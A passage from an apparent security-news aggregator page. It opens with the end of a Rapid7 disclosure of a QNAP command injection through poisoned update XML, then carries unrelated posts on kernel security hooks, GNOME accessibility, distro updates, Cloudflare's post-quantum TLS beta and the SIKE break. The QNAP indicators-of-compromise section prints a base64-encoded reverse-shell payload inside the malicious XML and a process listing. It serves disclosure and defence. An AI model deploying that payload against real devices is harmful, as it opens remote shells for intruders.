An attacker can force a QNAP device to download the XML file by sending the device an HTTP request similar to http://device_ip/cgi-bin/qnapmsg.cgi?lang=eng. Here, again, eng can be replaced by a variety of languages.

Obviously, the number one challenge to exploit this issue is getting the HTTP requests for update.qnap.com routed to an attacker-controlled system.

QNAP Poisoned XML Command Injection (Silently Patched)

Becoming a man-in-the-middle is not easy for a normal attacker. However, APT groups have consistently demonstrated that man-in-the-middle attacks are a part of normal operations. VPNFilter, FLYING PIG, and the Iranian Digator incident are all historical examples of APT attacking (or potentially attacking) via man-in-the-middle. An actor that has control of any router between the QNAP and update.qnap.com can inject the malicious XML we provided above. This, in turn, allows them to execute arbitrary code on the QNAP device.

QNAP Poisoned XML Command Injection (Silently Patched)

The other major attack vector is via DNS hijacking. For this vulnerability, the most likely DNS hijack attacks that don’t require man-in-the-middling are router DNS hijack or third-party DNS server compromise. In the case of a router DNS hijack, the attacker exploits a router and instructs it to tell all connected devices to use a malicious DNS server or malicious static routes (similar to our lab setup). Third-party DNS server compromise is more interesting because of its ability to scale. Both Mandiant and Talos have observed this type of DNS hijack in the wild. When a third-party DNS server is compromised, an attacker is able to introduce malicious entries to the DNS server.

QNAP Poisoned XML Command Injection (Silently Patched)

So, while there is some complexity to exploiting this issue, those complications are easily defeated by a moderately skilled attacker — which calls into question why QNAP didn’t issue an advisory and CVE for this issue. Presumably they knew about the vulnerability, because they made two changes to fix it. First, the insecure HTTP request for the XML was changed to a secure HTTPS request. That prevents all but the most advanced attackers from masquerading as update.qnap.com. Additionally, the image download logic was updated to use an execl wrapper called qnap_exec instead of system, which mitigates command injection issues.

QNAP Poisoned XML Command Injection (Silently Patched)

Indicators of compromise

This attack does leave indicators of compromise (IOCs) on disk. A smart attacker will clean up these IOCs, but they may be worth checking for. The downloaded XML files are downloaded to /home/httpd/RSS/rssdoc/. The following is an example of the malicious XML from our proof-of-concept video:

[albinolobster@NAS4A32F3 rssdoc]$ ls -l
total 32
-rw-r--r-- 1 admin administrators     0 2022-07-27 19:57 gen_qnapmsg_eng.xml
drwxrwxrwx 2 admin administrators  4096 2022-07-26 18:39 image/
-rw-r--r-- 1 admin administrators     8 2022-07-27 19:57 last_uptime.qnapmsg_eng.xml
-rw-r--r-- 1 admin administrators   229 2022-07-27 19:57 qnapmsg_eng.xml
-rw-r--r-- 1 admin administrators 18651 2022-07-27 16:02 wget.log
[albinolobster@NAS4A32F3 rssdoc]$ cat qnapmsg_eng.xml 
<?xml version="1.0" encoding="utf-8"?>
<Root>
<Messages>
<Message><img>/`(echo -ne 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d | sh)&`</img><link>http://www.qnap.com/</link></Message></Messages></Root>

Similarly, an attack can leave an sh process hanging in the background. Search for malicious ones using ps | grep wget. If you see anything like the following, it’s a clear IOC:

[albinolobster@NAS4A32F3 rssdoc]$ ps | grep wget
10109 albinolo    476 S   grep wget
12555 admin      2492 S   sh -c /usr/bin/wget -t 1 -T 5 /`(echo -ne
'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d |
sh)` -O /home/httpd/RSS/rssdoc/image/`(echo -ne
'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d |
sh)`.tmp 1>>/dev/null 2>>/dev/null

Conclusion

Perhaps what we’ve described here is in part CVE-2020-2509, and that explains the lack of advisory from QNAP. Or maybe it’s one of the many other command injections that QNAP has assigned a CVE but failed to describe, and therefore denied users the chance to make informed choices about their security. It’s impossible to know because QNAP publishes almost no details about any of their vulnerabilities — a practice that might thwart some attackers, but certainly harms defenders trying to identify and monitor these attacks in the wild, as well as defenders who have to help clean up the myriad ransomware cases that are affecting QNAP devices.

SAM did not owe us a good disclosure (which is fortunate, because they didn’t give us one), but QNAP did. SAM was successful in ensuring the issue got fixed, and they held the vendor to a coordinated disclosure deadline (which QNAP consequently failed to meet). We should all be grateful to SAM: Even if their disclosure wasn’t necessarily what we wanted, we all benefited from their work. It’s QNAP that owes us, the customers and security industry, good disclosures. Vendors who are responsible for the security of their products are also responsible for informing the community of the seriousness of vulnerabilities that affect those products. When they fail to do this — for example by failing to provide advisories with basic descriptions, affected components, and industry-standard metrics like CVSS — they deny their current and future users full autonomy over the choices they make about risk to their networks. This makes us all less secure.

Disclosure timeline

  • July, 2022: Researched and discovered by Jake Baines of Rapid7
  • Thu, Jul 28, 2022: Disclosed to QNAP, seeking a CVE ID
  • Sun, Jul 31, 2022: Automated response from vendor indicating they have moved to a new support ticket system and ticket should be filed with that system. Link to new ticketing system merely sends Rapid7 to QNAP’s home page.
  • Tue, Aug 2, 2022: Rapid7 informs QNAP via email that their support link is broken and Rapid7 will publish this blog on August 4, 2022.
  • Tue, Aug 2, 2022: QNAP responds directing Rapid7 to the advisory for CVE-2020-2509.
  • Thu, Aug 4, 2022: This public disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

[$] A security-module hook for user-namespace creation

Post Syndicated from original https://lwn.net/Articles/903580/

The Linux Security Module (LSM) subsystem works by way of an extensive set
of hooks placed strategically throughout the kernel. Any specific security
module can attach to the hooks for the behavior it intends to govern and be
consulted whenever a decision needs to be made. The placement of LSM hooks
often comes with a bit of controversy; developers have been known to object
to the
performance cost of hooks in hot code paths, and sometimes there are misunderstandings over how integration with
LSMs should be handled. The disagreement over a security hook for the
creation of user namespaces, though, is based on a different sort of
concern.

Mena Quintero: Paying technical debt in our accessibility infrastructure

Post Syndicated from original https://lwn.net/Articles/903822/

On his blog, Federico Mena Quintero posted a transcript of his recent talk at GUADEC 2022 on the technical debt in the GNOME accessibility infrastructure—and what he has been doing to help pay that down. He began the talk by describing the infrastructure and how it came about:

Gnome-shell implements its own toolkit, St, which stands for “shell toolkit”. It is made accessible by implementing the GObject interfaces in atk. To make a toolkit accessible means adding a way to extract information from it in a standard way; you don’t want screen readers to have separate implementations for GTK, Qt, St, Firefox, etc. For every window, regardless of toolkit, you want to have a “list children” method. For every widget you want “get accessible name”, so for a button it may tell you “OK button”, and for an image it may tell you “thumbnail of file.jpg”. For widgets that you can interact with, you want “list actions” and “run action X”, so a button may present an “activate” action, and a check button may present a “toggle” action.

However, ATK is just abstract interfaces for the benefit of toolkits. We need a way to ship the information extracted from toolkits to assistive tech like screen readers. The atspi protocol is a set of DBus interfaces that an application must implement; atk-adaptor is an implementation of those DBus interfaces that works by calling atk’s slightly different interfaces, which in turn are implemented by toolkits. Atk-adaptor also caches some things that it already asked to the toolkit, so it doesn’t have to ask again unless the toolkit notifies about a change.

Does this seem like too much translation going on? It is! We will see the reasons behind that when we talk about how accessibility was implemented many years ago in GNOME.

Security updates for Thursday

Post Syndicated from original https://lwn.net/Articles/903816/

Security updates have been issued by Fedora (lua), Oracle (kernel), Red Hat (389-ds:1.4, django, firefox, go-toolset and golang, go-toolset-1.17 and go-toolset-1.17-golang, go-toolset:rhel8, java-1.8.0-ibm, java-17-openjdk, kernel, kernel-rt, kpatch-patch, mariadb:10.5, openssl, pcre2, php, rh-mariadb105-galera and rh-mariadb105-mariadb, ruby:2.5, thunderbird, vim, and virt:rhel and virt-devel:rhel), Scientific Linux (firefox and thunderbird), SUSE (drbd, java-17-openjdk, java-1_8_0-ibm, keylime, ldb, samba, mokutil, oracleasm, pcre2, permissions, postgresql-jdbc, python-numpy, samba, tiff, u-boot, and xscreensaver), and Ubuntu (nvidia-graphics-drivers-390, nvidia-graphics-drivers-450-server, nvidia-graphics-drivers-470, nvidia-graphics-drivers-470-server, nvidia-graphics-drivers-510, nvidia-graphics-drivers-510-server, nvidia-graphics-drivers-515, nvidia-graphics-drivers-515-server).

Experiment with post-quantum cryptography today

Post Syndicated from Bas Westerbaan original https://blog.cloudflare.com/experiment-with-pq/

Experiment with post-quantum cryptography today

Experiment with post-quantum cryptography today

Practically all data sent over the Internet today is at risk in the future if a sufficiently large and stable quantum computer is created. Anyone who captures data now could decrypt it.

Luckily, there is a solution: we can switch to so-called post-quantum (PQ) cryptography, which is designed to be secure against attacks of quantum computers. After a six-year worldwide selection process, in July 2022, NIST announced they will standardize Kyber, a post-quantum key agreement scheme. The standard will be ready in 2024, but we want to help drive the adoption of post-quantum cryptography.

Today we have added support for the X25519Kyber512Draft00 and X25519Kyber768Draft00 hybrid post-quantum key agreements to a number of test domains, including pq.cloudflareresearch.com.

Do you want to experiment with post-quantum on your test website for free? Mail [email protected] to enroll your test website, but read the fine-print below.

What does it mean to enable post-quantum on your website?

If you enroll your website to the post-quantum beta, we will add support for these two extra key agreements alongside the existing classical encryption schemes such as X25519. If your browser doesn’t support these post-quantum key agreements (and none at the time of writing do), then your browser will continue working with a classically secure, but not quantum-resistant, connection.

Then how to test it?

We have open-sourced a fork of BoringSSL and Go that has support for these post-quantum key agreements. With those and an enrolled test domain, you can check how your application performs with post-quantum key exchanges. We are working on support for more libraries and languages.

What to look for?

Kyber and classical key agreements such as X25519 have different performance characteristics: Kyber requires less computation, but has bigger keys and requires a bit more RAM to compute. It could very well make the connection faster if used on its own.

We are not using Kyber on its own though, but are using hybrids. That means we are doing both an X25519 and Kyber key agreement such that the connection is still classically secure if either is broken. That also means that connections will be a bit slower. In our experiments, the difference is very small, but it’s best to check for yourself.

The fine-print

Cloudflare’s post-quantum cryptography support is a beta service for experimental use only. Enabling post-quantum on your website will subject the website to Cloudflare’s Beta Services terms and will impact other Cloudflare services on the website as described below.

No stability or support guarantees

Over the coming months, both Kyber and the way it’s integrated into TLS will change for several reasons, including:

  1. Kyber will see small, but backward-incompatible changes in the coming months.
  2. We want to be compatible with other early adopters and will change our integration accordingly.
  3. As, together with the cryptography community, we find issues, we will add workarounds in our integration.

We will update our forks accordingly, but cannot guarantee any long-term stability or continued support. PQ support may become unavailable at any moment. We will post updates on pq.cloudflareresearch.com.

Features in enrolled domains

For the moment, we are running enrolled zones on a slightly different infrastructure for which not all features, notably QUIC, are available.

With that out of the way, it’s…

Demo time!

BoringSSL

With the following commands build our fork of BoringSSL and create a TLS connection with pq.cloudflareresearch.com using the compiled bssl tool. Note that we do not enable the post-quantum key agreements by default, so you have to pass the -curves flag.

$ git clone https://github.com/cloudflare/boringssl-pq
[snip]
$ cd boringssl-pq && mkdir build && cd build && cmake .. -Gninja && ninja 
[snip]
$ ./tool/bssl client -connect pq.cloudflareresearch.com -server-name pq.cloudflareresearch.com -curves Xyber512D00
	Connecting to [2606:4700:7::a29f:8a55]:443
Connected.
  Version: TLSv1.3
  Resumed session: no
  Cipher: TLS_AES_128_GCM_SHA256
  ECDHE curve: X25519Kyber512Draft00
  Signature algorithm: ecdsa_secp256r1_sha256
  Secure renegotiation: yes
  Extended master secret: yes
  Next protocol negotiated: 
  ALPN protocol: 
  OCSP staple: no
  SCT list: no
  Early data: no
  Encrypted ClientHello: no
  Cert subject: CN = *.pq.cloudflareresearch.com
  Cert issuer: C = US, O = Let's Encrypt, CN = E1

Go

Our Go fork doesn’t enable the post-quantum key agreement by default. The following simple Go program enables PQ by default for the http package and GETs pq.cloudflareresearch.com.

​​package main

import (
  "crypto/tls"
  "fmt"
  "net/http"
)

func main() {
  http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{
    CurvePreferences: []tls.CurveID{tls.X25519Kyber512Draft00, tls.X25519},
    CFEventHandler: func(ev tls.CFEvent) {
      switch e := ev.(type) {
      case tls.CFEventTLS13HRR:
        fmt.Printf("HelloRetryRequest\n")
      case tls.CFEventTLS13NegotiatedKEX:
        switch e.KEX {
        case tls.X25519Kyber512Draft00:
          fmt.Printf("Used X25519Kyber512Draft00\n")
        default:
          fmt.Printf("Used %d\n", e.KEX)
        }
      }
    },
  }

  if _, err := http.Get("https://pq.cloudflareresearch.com"); err != nil {
    fmt.Println(err)
  }
}

To run we need to compile our Go fork:

$ git clone https://github.com/cloudflare/go
[snip]
$ cd go/src && ./all.bash
[snip]
$ ../bin/go run path/to/example.go
Used X25519Kyber512Draft00

On the wire

So what does this look like on the wire? With Wireshark we can capture the packet flow. First a non-post quantum HTTP/2 connection with X25519:

Experiment with post-quantum cryptography today

This is a normal TLS 1.3 handshake: the client sends a ClientHello with an X25519 keyshare, which fits in a single packet. In return, the server sends its own 32 byte X25519 keyshare. It also sends various other messages, such as the certificate chain, which requires two packets in total.

Let’s check out Kyber:

Experiment with post-quantum cryptography today

As you can see the ClientHello is a bit bigger, but still fits within a single packet. The response takes three packets now, instead of two, because of the larger server keyshare.

Under the hood

Want to add client support yourself? We are using a hybrid of X25519 and Kyber version 3.02. We are writing out the details of the latter in version 00 of this CRFG IETF draft, hence the name. We are using TLS group identifiers 0xfe30 and 0xfe31 for X25519Kyber512Draft00 and X25519Kyber768Draft00 respectively.

There are some differences between our Go and BoringSSL forks that are interesting to compare.

  • Our Go fork uses our fast AVX2 optimized implementation of Kyber from CIRCL. In contrast, our BoringSSL fork uses the simpler portable reference implementation. Without the AVX2 optimisations it’s easier to evaluate. The downside is that it’s slower. Don’t be mistaken: it is still very fast, but you can check yourself.
  • Our Go fork only sends one keyshare. If the server doesn’t support it, it will respond with a HelloRetryRequest message and the client will fallback to one the server does support. This adds a roundtrip.
    Our BoringSSL fork, on the other hand, will send two keyshares: the post-quantum hybrid and a classical one (if a classical key agreement is still enabled). If the server doesn’t recognize the first, it will be able to use the second. In this way we avoid a roundtrip if the server does not support the post-quantum key agreement.

Looking ahead

The quantum future is here. In the coming years the Internet will move to post-quantum cryptography. Today we are offering our customers the tools to get a headstart and test post-quantum key agreements. We love to hear your feedback: e-mail it to [email protected].

This is just a small, but important first step. We will continue our efforts to move towards a secure and private quantum-secure Internet. Much more to come — watch this space.

SIKE Broken

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/08/sike-broken.html

SIKE is one of the new algorithms that NIST recently added to the post-quantum cryptography competition.

It was just broken, really badly.

We present an efficient key recovery attack on the Supersingular Isogeny Diffie­-Hellman protocol (SIDH), based on a “glue-and-split” theorem due to Kani. Our attack exploits the existence of a small non-scalar endomorphism on the starting curve, and it also relies on the auxiliary torsion point information that Alice and Bob share during the protocol. Our Magma implementation breaks the instantiation SIKEp434, which aims at security level 1 of the Post-Quantum Cryptography standardization process currently ran by NIST, in about one hour on a single core.

News article.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close